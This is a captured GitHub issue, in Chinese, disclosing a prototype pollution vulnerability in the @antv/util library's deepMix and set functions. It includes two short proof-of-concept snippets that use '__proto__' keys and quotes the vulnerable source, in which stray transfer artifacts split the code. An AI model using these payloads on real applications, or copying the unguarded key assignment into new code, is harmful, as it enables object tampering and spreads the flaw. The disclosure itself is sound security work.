8000 潜在的原型链污染漏洞 · Issue #114 · antvis/util · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
潜在的原型链污染漏洞 #114
New issue
New issue
Open
Open
潜在的原型链污染漏洞#114
@yllhwa

Description

@yllhwa
yllhwa
opened on May 22, 2024

复现代码1:

let deepMix = require("@antv/util").deepMix;

let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');

let obj = {};
deepMix(obj, BAD_JSON);

console.log({}.test); // 123

问题代码:

util/src/lodash/deep-mix.ts

Lines 42 to 47 in c499a30

const deepMix = function (rst: any, ...args: any[]) {
for (let i = 0; i < args.length; i += 1) {
_deepMix(rst, args[i]);
}
return rst;
};

复现代码2:

let set = require("@antv/util").set;

let obj = {};
set(obj, "__proto__.test", 123);

console.log({}.test); // 123

问题代码:

util/src/lodash/set.ts

Lines 5 to 29 in c499a30

/**
* https://github.com/developit/dlv/blob/master/index.js
* @param obj
* @param path
* @param value
*/
export default (obj: any, path: string | any[], value: any): any => {
let o = obj;
const keyArr = isString(path) ? path.split('.') : path;
keyArr.forEach((key: string | number, idx: number) => {
// 不是最后一个
if (idx < keyArr.length - 1) {
if (!isObject(o[key])) {
o[key] = isNumber(keyArr[idx + 1]) ? [] : {};
}
o = o[key];
} e 5274 lse {
o[key] = value;
}
});
return obj;
};

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions
      0